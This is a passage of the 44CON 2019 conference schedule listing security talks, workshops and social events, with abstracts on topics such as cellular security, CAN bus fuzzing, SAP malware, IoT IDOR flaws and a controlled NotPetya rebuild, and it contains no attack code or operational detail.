PWC
Matt is the Research Lead for the PwC Cyber Security practice in the UK, and is a PhD candidate at University College London. Prior to joining PwC, Matt led a technical R&D team for a law enforcement agency in the UK. His research interests include antivirus and sandboxing technologies... Read More →


Thursday September 12, 2019 15:30 - 16:29
* Track 1 *

15:30

Matt Summers - 4G to 5G - Cellular Security Myths and the Reality (not filmed)
To date, cellular technology has been about delivering a small number of services to end users. The advent of 5G will introduce not only new end user services but also a number of new paradigms that mobile operators will have to implement. With the reduction in cost of software defined radios and freely available mobile technology stacks, the barrier to entry into mobile technology hacking has never been lower. That said, there are still a number of myths and misconceptions with regards to mobile security, and this will only get worse as additional end user services are released.

During this presentation we will walk through a number of key topics including 4G security, IMSI catchers, 5G services, 5G security and the adversaries that an end user can face.

Please note, this talk will not be filmed.

Thursday September 12, 2019 15:30 - 16:29
* Track 2 *

16:15

Gin o'clock
Thursday September 12, 2019 16:15 - 16:59
Main Hall

17:00

Pizza with Detectify
Thursday September 12, 2019 17:00 - 19:00
Main Hall

19:00

Many Hats Club Intro
Thursday September 12, 2019 19:00 - 19:30
Village Pub

19:30

Johanna Ydergård - How to have a broader impact as an ethical hacker
1st Many Hats Club Talk


Thursday September 12, 2019 19:30 - 20:15
* Track 1 *

20:00

Blade Runner 2049
Thursday September 12, 2019 20:00 - 22:29
Village Hall

20:30

Live Many Hats Club Podcast Session
Thursday September 12, 2019 20:30 - 21:30
* Track 1 *

20:30

Pub Quiz
Many Hats Pub Quiz

Thursday September 12, 2019 20:30 - 21:30
Village Pub

21:45

Scammerz Live Scambaiting hosted by Stu [NSFW]
Live scam baiting, anyone can join in.

Thursday September 12, 2019 21:45 - 22:30
Village Pub

21:45

Slide Roulette
Thursday September 12, 2019 21:45 - 22:30
* Track 1 *

Friday, September 13

08:00

Doors open for Day 2
Friday September 13, 2019 08:00 - 09:19
Registration

09:20

44CON 2019 Day 2 Opening

Friday September 13, 2019 09:20 - 09:29
* Track 1 *

09:30

Klaus Schmeh - Cold War Cryptography
The use of cryptography during the Cold War is a fascinating, yet still little researched topic. Though most of it is still classified, a considerable amount of information about Cold War encryption has become public over the last two decades. The purpose of this talk is to tell the five or six most stunning crypto stories from the Cold War era in an entertaining, yet informative way. As always, the speaker will use Lego models, self-drawn cartoons and similar means to support his speech.

Speakers

Klaus Schmeh

Klaus Schmeh has published 16 books, 200 articles, 1,000 blog posts and 25 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most of his other publications are in German. Klaus Schmeh...


Friday September 13, 2019 09:30 - 10:29
* Track 1 *

09:30

Rebalance Every 10,000 Kilometers
Careers are long. Jobs are short. One day, things are going well and in balance. The next day, there’s twenty hours of work to do. Pull back some and it is more of the same. The first half of the year, things were great. Then change came, chaos reigned and burnout followed. Pull back even further, and the demands of work and life over decades come into sharp relief. This session presents strategies to maintain your mental health over the long haul. Handle imposter syndrome and stress. Know when to stick it out, but recognize the signs when it is just not worth it. Fail and recover gracefully. Drawing on personal lessons and anecdotes from mentoring others, the presentation provides a career user manual.

Speakers

J. Wolfgang Goerlich

Advisory CISO, Duo Security
J Wolfgang Goerlich supports information security initiatives for clients in the healthcare, education, financial services, and energy verticals. In his current role with CBI, a cyber security consultancy firm, Wolfgang is the senior vice president for strategic security programs...


Friday September 13, 2019 09:30 - 10:29
* Track 2 *

09:30

Ian Tabor - Car Hacking Village - CAN bus basics with hands on fuzzing
The ‘Car Hacking Village’ has a ‘CAR in a box’, which is most of the ECU components from a Peugeot 208. This is configured so that all the main dials on the vehicle work: speedo, rev counter, fuel gauge and temp gauge. This will give attendees who get through the fuzzing part access to a complete vehicle to hack.

The workshop will consist of a short presentation on the history of CAN bus, the physical layer, the speeds, data format and message IDs. The attendees will then have access to sets of instrument clusters (hopefully 10-12 sets) to fuzz, to try to work out which messages cause which parts of the cluster to work. Each cluster set will include a CAN bus adapter that can be used for the fuzzing.

Speakers

Ian Tabor

Network / security architect who has a passion for car hacking, has found vulnerabilities in his own car and also in private car bug bounties. Now runs Car Hacking Village UK and is part of the team behind CHV at DEF CON.


Friday September 13, 2019 09:30 - 11:59
* Workshop *

09:30

Matt Lorentzen - Automating user interaction with Sheepl: Soup to Nuts
Sheepl is a tool designed to emulate user behaviour and has matured into a platform for supporting tradecraft development for both red and blue teams. The tool was born out of a personal need for ‘sparring’ partners without the predictability of knowing when things are going to happen.

Using a representative network I plan to give participants hands-on experience of creating Sheepl that can be used to attack, execute commands and emulate real-world user actions such as browsing, opening emails, interacting with command environments and creating content.

The environment will also have a monitoring solution deployed that can be used to trace commands that will be executed from the ATT&CK framework. The workshop will also cover creating Sheepl that respond to events on a system and the example used will be to create Sheepl that watch for supplied process names and kill these automatically after a period of time. This is good for operational security considerations when looking at Red Team tradecraft development and for CTF style events.

I will also show the process of creating custom tasks to extend Sheepl capabilities and how sequences of tasks can be saved as JSON profiles. The goal is that by the end of the workshop, participants will have a solid understanding of the planning and workflow for creating Sheepl that support specific learning objectives as well as generating more realistic end user behaviour within training environments.

Speakers

Matt Lorentzen

Matt has 20 years’ IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements. Before joining SpiderLabs, he worked with Hewlett...


Friday September 13, 2019 09:30 - 11:59
Village Hall

10:30

Break
Friday September 13, 2019 10:30 - 10:59
Main Hall

11:00

Jordan Santarsieri - Spyware, Ransomware and Worms. How to prevent the next SAP tragedy
It is no secret that SAP is a market leader and one of the principal providers of core business applications around the world: nearly 95% of the Fortune 500 companies rely heavily on SAP to perform their most critical daily operations, such as processing payroll and benefits, storing sensitive customer information, handling credit cards, logistics and many more.

Due to the “ERP Complexity of the simple things”, in combination with several proprietary protocols, entry points and default misconfigurations, ERPs are particularly vulnerable to spyware, ransomware and worms, making them ideal targets for these types of attack given the economic significance that these systems hold.

Join me in this completely new and highly technical talk, in which I’m going to explain, through several live demos, how the different types of malware could impact SAP and what actions you could take to prevent the next SAP tragedy.

As an added value, we will reveal for the first time our very own project “ARSAP”, a semi-automatic mechanism that detects and registers all the SAP systems that are exposed to the Internet, extracting the systems’ metadata and cataloguing the assets by their geo-location, system type, version, installed components, etc.

Speakers

Jordan Santarsieri

Vicxer
Mr Santarsieri is a founding partner at Vicxer, where he utilizes his 12+ years of experience in the security industry to bring top-notch research into the ERP (SAP / Oracle) world. He is engaged in a daily effort to identify, analyze, exploit and mitigate vulnerabilities affecting...


Friday September 13, 2019 11:00 - 11:59
* Track 1 *

11:00

Tony Gee & Vangelis Stykas - The billion dollar IoT attack no one knows about
What would you do if you knew you could exploit 20 million plus IoT devices? Denial of service? Old hat. Power grid manipulation? Boring! What about making a billion dollars? Many IoT tracking devices now use cellular data networks to communicate with servers allowing owners to track and interact in near real time with their devices. Which is great, but is that opening another avenue for attack?

Sometimes it feels we are going backwards in IoT security: along with the obvious wireless attacks, the rooting of the latest must-have sex toy and the very public exposure of undocumented services on Shodan, we have seen countless compromises performed through simple logic flaws. Insecure Direct Object References (IDOR) are commonly used in attacks that look to compromise the web service to take over the end user account. They are most often found in the rush to deliver new devices, usually from companies playing catch-up with their outsourced development team. These logic flaws allow the attacker to perform functions as the user, such as remotely unlocking, starting and stealing your car or tracking your kids in real time. Great, so money made, move on, right? Well, there are many problems with stealing a car or kidnapping a child for ransom: not least, you might easily get arrested; moving stolen goods, especially high-value stolen goods, is harder than you think; and, let’s be honest, a kidnapping and ransom is not a good look for anyone. But are we missing a trick?

In this talk we will look at connected tracking devices and show examples of how simple logic flaws are being repeated time and time again across multiple devices. We will show how manufacturers and developers are white-labelling vulnerable APIs and selling them on to multiple tracking device companies, magnifying the issue millions of times for unsuspecting victims around the world.

However, while IDOR is well known, what is not is a new technique of abusing these logic flaws for financial gain. So far unused by malicious hackers, it can easily be used to turn 20 million tracking devices into nearly a billion dollars, all without the manufacturers, and possibly the owners, knowing anything about it. We will show how trivial it is to exploit, how the attack can be instigated worldwide in seconds to immediately start making money, and how the attack can be repeated time and time again with little or no repercussions.

Speakers

Tony Gee

Pen Test Partners
Tony has over 14 years of security experience. He has worked both as an internal blue team consultant within the finance industry and for the technology partner for the world-leading Oyster card system, and more latterly as an external security tester and auditor. Tony speaks the...

Vangelis Stykas

Pen Test Partners
Vangelis Stykas is a backend engineer turned pentester. Playing around with bits and bytes for the past 30 years, he has hacked ships, cars and locks. He has a weak spot for breaking APIs and web stuff but hates building them.


Friday September 13, 2019 11:00 - 11:59
* Track 2 *

12:00

Lunch
Friday September 13, 2019 12:00 - 13:59
1st Floor Restaurant

14:00

Kyle Tobener & Alessandro Lapucci - Throw Open The Gates: Trading Control for Visibility
As many enterprises shift to a cloud-first business model, asset visibility can become increasingly difficult for security. Cumbersome gated approval processes, a security mainstay for years, are now quickly bypassed in the name of developer agility and growth. Security practitioners need new approaches that move at the pace of this new DevOps-driven world.

In this session, we will tell the story of a simple premise: can we discard a cumbersome approval process, throw open the gates, and build visibility for security by offering free “backdoored” server resources to developers? We’ll share the context that led to our premise, the tooling we built to facilitate the experiment, our success criteria, 3 years of practical experience running the program, and lessons learned.

Speakers

Kyle Tobener

Salesforce
Kyle Tobener is a Director of Enterprise Security at Salesforce. He began his professional career as a zoologist but fled the jungle to return to San Francisco and focus on tech. His specialty now is application security, with a side dish of 3rd party vetting and contract negotiation...

Alessandro Lapucci

Alessandro is a Lead Software/Security Engineer with Security Compliance at Salesforce, where he develops internal automation tools and customer-facing web applications. Born and raised in Italy, he lived in Ireland and California before recently moving to Switzerland. When he isn’t...


Friday September 13, 2019 14:00 - 14:59
* Track 1 *

15:00

Aaron Adams, Cedric Halbronn & James Fisher - EternalGlue - Rewriting NotPetya for corporate use
NCC Group had a large corporate client that was interested in how their production network would be impacted if they were hit by the NotPetya worm. Cedric and Aaron ended up reverse engineering NotPetya and building a custom version with all the ransomware/destructive capabilities pulled out, and plugged it inside new logic to limit how it spreads. This allowed client-defined parameters to dictate where it could propagate, and also allowed infections to transmit telemetry information back to a central server to give visibility into how and where it spread.

After providing the client with the tool, they went through a three-phase approach of ensuring that the simulated worm actually behaved as expected, with the final phase being them running it within their corporate production environment. This allowed them to observe how the real threat would’ve spread, highlighted some important mitigations already in place, and highlighted areas of their network they didn’t anticipate being affected.

Cedric and Aaron will discuss the work involved in reverse engineering NotPetya, the logic introduced to ensure safe and controlled propagation, some of the technical hurdles encountered, the basic AV bypassing required, the lab environment used for testing, etc. James will discuss his experience from the client’s perspective and what was involved in convincing such a large organization to get on board with running such a tool in a production environment.

This opens up a new phase of development and tooling opportunity for the defense industry. It allows us to much more closely mimic real-world scenarios in a controlled fashion, and gives different, and arguably more realistic, visibility into the effects of such real-world attacks, versus more traditional consulting approaches.

Speakers

Aaron Adams

NCC Group
Aaron works in NCC Group’s Exploit Development Group. He has been doing reverse engineering / exploit development / code review for 15+ years. For some reason he is particularly fond of heaps.

Cedric Halbronn

NCC Group
Cedric (@saidelike) joined NCC Group in 2015 and has been doing reverse engineering / exploit development for 10+ years. His current interests are memory corruption bugs in the Windows kernel, HP iLO, mobile devices, embedded devices, etc.

James Fisher

For the last 6 years James has been responsible for defending a large global network against technically minded adversaries; prior to this he spent 11 years as a senior penetration tester, 6 of them as a CHECK team leader.


Friday September 13, 2019 15:00 - 15:59
* Track 1 *

16:00

Closing ceremony

Friday September 13, 2019 16:00 - 16:29
* Track 1 *